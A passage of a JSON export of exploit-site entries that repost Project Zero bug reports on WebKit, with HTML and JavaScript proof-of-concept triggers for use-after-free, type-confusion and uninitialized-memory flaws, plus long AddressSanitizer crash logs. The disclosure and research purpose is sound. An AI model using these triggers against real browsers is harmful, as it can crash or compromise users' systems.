WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #25 0x105ec5689 in void 
IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const\r\nShadow bytes around the buggy address:\r\n 0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 
0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==30692==ABORTING\r\n-->\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28176"}, {"lastseen": "2018-02-16T05:10:25", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2017-07-24T00:00:00", "title": "WebKit - WebCore::AccessibilityNodeObject::textUnderElement Use-After-Free Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7048"], "modified": "2017-07-24T00:00:00", "href": "https://0day.today/exploit/description/28181", "id": "1337DAY-ID-28181", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1249\r\n \r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n \r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). 
On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<script>\r\nfunction go() {\r\n li.hidden = true;\r\n dir.setAttribute(\"aria-labeledby\", \"map\");\r\n}\r\n</script>\r\n<body onload=go()>\r\n<dir id=\"dir\">\r\n<li id=\"li\">\r\n<map id=\"map\">\r\n<area></area>\r\n \r\n<!--\r\n=================================================================\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428\r\nREAD of size 8 at 0x6080000908a0 thread T0\r\n==728==WARNING: invalid path to external symbolizer!\r\n==728==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4)\r\n #1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #14 0x10a82607c 
in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n #20 0x279e6e001027 (<unknown module>)\r\n #21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #23 0x115e2291a in vmEntryToJavaScript 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)\r\n #24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)\r\n #25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)\r\n #26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)\r\n #27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)\r\n #28 0x1150416d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)\r\n #29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)\r\n #30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const\r\n==728==ABORTING\r\n-->\n\n# 0day.today [2018-02-16] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28181"}, {"lastseen": "2018-04-14T15:45:37", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2017-09-12T00:00:00", "type": "zdt", "title": "WebKit JSC BytecodeGenerator::emitGetByVal 
Incorrect Optimization Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7061"], "modified": "2017-09-12T00:00:00", "href": "https://0day.today/exploit/description/28492", "id": "1337DAY-ID-28492", "sourceData": "WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal \r\n\r\nCVE-2017-7061\r\n\r\n\r\nLet's start with JS code.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n}\r\n\r\nWhen the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.\r\n\r\nHere's the code of BytecodeGenerator::emitGetByVal.\r\n\r\nRegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)\r\n{\r\n for (size_t i = m_forInContextStack.size(); i > 0; i--) {\r\n ForInContext& context = m_forInContextStack[i - 1].get();\r\n if (context.local() != property)\r\n continue;\r\n\r\n if (!context.isValid())\r\n break;\r\n\r\n if (context.type() == ForInContext::IndexedForInContextType) {\r\n property = static_cast<IndexedForInContext&>(context).index();\r\n break;\r\n }\r\n\r\n ASSERT(context.type() == ForInContext::StructureForInContextType);\r\n StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(structureContext.index()->index());\r\n instructions().append(structureContext.enumerator()->index());\r\n instructions().append(profile);\r\n return dst;\r\n }\r\n\r\n UnlinkedArrayProfile arrayProfile = newArrayProfile();\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(arrayProfile);\r\n instructions().append(profile);\r\n return dst;\r\n}\r\n\r\nThe method uses 
op_get_by_val to handle expressions like \"o[i]\". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that \"i\" will be a string (\"xx\") semantically. Therefore, it will use op_get_direct_pname to handle it.\r\n\r\nHere's another example.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n i = 0x123456; <<-------- (b)\r\n o[i]; <<-------- (c)\r\n}\r\n\r\nIn this case, it will use op_get_direct_pname at (a). And at (b), since the index variable \"i\" is replaced, the invalidate method of the ForInContext object that makes \"context.isValid()\" return false is called. So, op_get_by_val will be used at (c).\r\n\r\nBut the problem is that it can't properly handle the following case, which causes a type confusion.\r\n\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.\r\n i = 0;\r\n }\r\n}\r\n\r\nPoC:\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i];\r\n i = new Uint32Array([0, 1, 0x777777, 0, 0]);\r\n }\r\n}\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: lokihardt\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/28492", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-26T23:07:25", "description": "WebKit suffers from a JSC JSArray::appendMemcpy uninitialized memory copy vulnerability.", "edition": 1, "published": "2017-07-25T00:00:00", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "href": "https://0day.today/exploit/description/28183", "id": "1337DAY-ID-28183", "sourceData": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \r\n\r\nCVE-2017-7064\r\n\r\n\r\nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of JSArray::appendMemcpy.\r\n\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n 
memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\nPoC:\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/28183"}, {"lastseen": "2018-03-12T17:13:02", "description": "WebKit JSC suffers from incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform.", "edition": 1, "published": "2017-07-25T00:00:00", "type": "zdt", "title": "WebKit JSC ArgumentsEliminationPhase::transform Incorrect LoadVarargs Handling Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7056"], "modified": "2017-07-25T00:00:00", "href": "https://0day.today/exploit/description/28187", "id": "1337DAY-ID-28187", "sourceData": "WebKit: JSC: Incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform \r\n\r\nCVE-2017-7056\r\n\r\n\r\nHere is a snippet of ArgumentsEliminationPhase::transform\r\n case LoadVarargs:\r\n ...\r\n if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {\r\n ...\r\n if (argumentCountIncludingThis <= varargsData->limit) {\r\n storeArgumentCountIncludingThis(argumentCountIncludingThis);\r\n // store arguments\r\n ...\r\n }\r\n\r\n node->remove();\r\n node->origin.exitOK = canExit;\r\n break;\r\n }\r\n\r\nWhether or not the \"argumentCountIncludingThis <= varargsData->limit\" condition is satisfied, it removes the |node| variable and exits the switch statement. 
So, in the case where the condition is not satisfied, the arguments object created by the following code (CreateDirectArguments in the PoC) may have uninitialized values and length.\r\n\r\nPoC:\r\nconst kArgsLength = 0x101;\r\n\r\nlet buggy = null;\r\nfunction inlineFunc() {\r\n if (arguments.length != kArgsLength) {\r\n buggy = arguments;\r\n }\r\n}\r\n\r\nclass ClassForInine extends inlineFunc {\r\n}\r\n\r\nfunction sleep(ms) {\r\n let start = new Date();\r\n while (new Date() - start < ms);\r\n}\r\n\r\nfunction main() {\r\n let args = new Array(kArgsLength);\r\n args.fill(333 + 1);\r\n args = args.join(', ');\r\n\r\n let opt = new Function(`(() => {\r\n new ClassForInine(${args});\r\n })();`);\r\n\r\n for (let i = 0; i < 0x100000; i++) {\r\n opt();\r\n\r\n if (i === 0x3000)\r\n sleep(1000);\r\n\r\n if (buggy) {\r\n print('buggy.length: ' + buggy.length);\r\n break;\r\n }\r\n }\r\n\r\n for (let i = 0, n = buggy.length; i < n; i++) {\r\n print(buggy[i]);\r\n }\r\n}\r\n\r\nmain();\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\n\n# 0day.today [2018-03-12] #", "sourceHref": "https://0day.today/exploit/28187", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T11:05:24", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2017-07-24T00:00:00", "type": "zdt", "title": "WebKit - WebCore::Node::nextSibling Use-After-Free Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7039"], "modified": "2017-07-24T00:00:00", "href": "https://0day.today/exploit/description/28179", "id": "1337DAY-ID-28179", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1241\r\n \r\nThere is a use-after-free security vulnerability in WebKit. 
The vulnerability was confirmed on ASan build of WebKit nightly.\r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<script>\r\nfunction freememory() {\r\n var a;\r\n for(var i=0;i<100;i++) {\r\n a = new Uint8Array(1024*1024);\r\n }\r\n}\r\nfunction go() {\r\n meter.textContent = \"foo\";\r\n freememory();\r\n}\r\nfunction eventhandler() {\r\n template.appendChild(table);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<meter id=\"meter\">\r\n<shadow>\r\n<template id=\"template\">\r\n</template>\r\n<style onload=\"eventhandler()\"></style>\r\n<table id=\"table\">\r\n<iframe></iframe>\r\n<svg>\r\n \r\n<!--\r\n=================================================================\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8\r\nREAD of size 8 at 0x60c0000b7070 thread T0\r\n==29516==WARNING: invalid path to external symbolizer!\r\n==29516==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a)\r\n #1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3)\r\n #2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #4 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, 
(JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #31 0x10cc439ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae)\r\n #32 0x111cd6602 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb21602)\r\n #33 0x111cca297 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb15297)\r\n #34 0x1119a03d1 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb3d1)\r\n #35 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #36 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #37 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #38 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #39 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #40 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) 
